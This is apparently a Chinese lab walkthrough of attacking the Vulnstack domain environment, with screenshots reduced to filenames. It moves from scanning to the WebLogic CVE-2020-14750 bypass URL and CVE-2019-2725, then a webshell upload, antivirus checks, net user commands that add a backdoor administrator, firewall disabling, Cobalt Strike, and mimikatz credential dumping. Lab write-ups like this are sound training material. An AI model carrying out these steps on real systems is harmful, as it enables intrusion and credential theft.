一、环境搭建

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

靶机通用密码: 1qaz@WSX

拓扑图

image-20240909103806499

环境说明

内网网段:10.10.10.1/24

image-20240909112914979

DMZ网段:192.168.111.1/24

image-20240909150417410

DC(仅允许内网用户访问,不出网):

IP:10.10.10.10

OS:Windows 2012(64)

应用:AD域

image-20240909113154824

image-20240909113230453

WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去):

IP1:10.10.10.80(和域内主机连通)

IP2:192.168.111.80(允许外网访问,网站部署在该ip)

OS:Windows 2008

应用:Weblogic 10.3.6 MSSQL 2008

修改配置需要登陆验证Administrator/1qaz@WSX

image-20240909151304508

image-20240909152657966

开启weblogic:C:\Oracle\Middleware\user_projects\domains\base_domain

image-20240909161047420

image-20240909161151196

内网网卡是禁止访问的

PC

IP1:10.10.10.111

IP2:192.168.111.201

OS:Windows 7,域内主机

image-20240909153027768

攻击机:

IP:192.168.111.130

OS:Kali

image-20240909161431649

OS:Windows 10

IP:192.168.111.129

image-20240909165322026

二、外网渗透

信息收集

拿到环境后,首先进行端口探测,这里使用**-sS参数,由于防火墙的存在不能使用icmp包,所以使用syn包探测**

nmap -sS -v 192.168.111.80

image-20240909164923586

可以看到开放的端口还是挺多的,我们通过端口初步判断目标机存在的服务及可能存在的漏洞,如445端口开放就意味着存smb服务,存在smb服务就可能存在ms17-010/端口溢出漏洞。开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞。开放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。开放3389端口,就存在远程桌面。开放7001端口就存在weblogic。

我们可以再用漏扫如fscan扫一下,能更快的确定漏洞位置,以及要利用的漏洞

image-20240909204906345

用fscan扫描可以发现是可能存在相关的漏洞的,

但我们在利用时可能有些漏洞是用不了的,猜测可能是因为防火墙或360等限制,但fscan还是 有扫出CVE-2020-14750,这个是一个未授权访问的楼洞,我们可以绕过登陆试试

http://192.168.111.80:7001/console/images/%252E./console.portal

image-20240909210034402

但是无法进行上传文件,我们可以试试cve-2019-2725,这个是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。

可以访问/_async/AsyncResponseService,则存在漏洞

http://192.168.111.80:7001/_async/AsyncResponseService

image-20240909210316411

查看网站路径

http://192.168.111.80:7001/_async/AsyncResponseService?info

image-20240909210417020

在本机中开启简易http服务器

python -m http.server 9966

image-20240909210634155

使用burp suite进行抓包,发送数据包,使服务下载木马文件,但没有下载工具所以不好上传,这两个洞都不是很好利用

漏洞利用

用weblogicscan扫一下,也可以直接用综合利用工具

https://github.com/rabbitmask/WeblogicScan

image-20240909212324407

还是综合利用工具方便

上传shell

因为我们开始是ping不通web主机的,可能被防火墙限制了,也可能存在杀毒软件,我们可以用命令执行看看当前进程,是否存在相关程序

tasklist /svc

image-20240909212922869

存在360,应该先做免杀的,但这里不会,就先不做了,然后这个工具没有写某些漏洞的上传,这里换个工具用

image-20240909223507458

上传shell

image-20240909230458466

image-20240909230429649

访问成功,尝试连接,这里换了个马,前面连接失败,估计是中文的问题,删除木马里的中文即可

image-20240909230954552

寻找一下位置

image-20240909231157137

注入内存马稳定shell:

image-20240909231243886

内网信息收集(1)

存在多张网卡

image-20240910100125127

看看是否在域环境中

net user /domain

image-20240910102809286

拒绝访问,看下变量

echo %userdomain%

image-20240910102831018

关闭杀软

一、 3389上去直接关闭,需要创建管理员用户
二、 提权到system关闭
三、 对c2做免杀

创建用户

net user eraser 1qaz@WSX /add
net localgroup Administrators eraser /add

image-20240910103144628

远程登陆,administrators域是登不进去的,只能登入到web域

image-20240910103515498

image-20240910104607823

关闭防火墙

image-20240910104827574

上线CS

image-20240910160550415

抓取明文密码

image-20240910161054947

可以直接dump hashes

image-20240910161109746

mimikatz

image-20240910161206539

点击credentails

image-20240910161823599

权限提升

ms14-058 提到 system 权限

我说怎么半天没回显

image-20240910230839759

蓝屏了。。。